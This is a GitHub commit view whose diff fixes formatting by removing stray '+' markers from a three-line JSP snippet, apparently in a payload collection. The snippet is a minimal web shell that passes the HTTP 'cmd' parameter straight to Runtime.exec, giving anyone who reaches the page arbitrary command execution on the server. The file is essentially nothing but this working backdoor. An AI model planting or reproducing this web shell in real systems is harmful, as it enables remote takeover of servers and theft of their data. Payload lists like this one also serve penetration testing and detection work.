remove what seems to be a git addition (`+`)
This commit is contained in:
Alexandre ZANNI 2019-03-11 17:12:47 +01:00 committed by GitHub
parent 9196a19470
commit 2affd894a4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -1,3 +1,3 @@
+<%
+Runtime.getruntime().exec(request.getParameter("cmd"))
+%>
<%
Runtime.getruntime().exec(request.getParameter("cmd"))
%>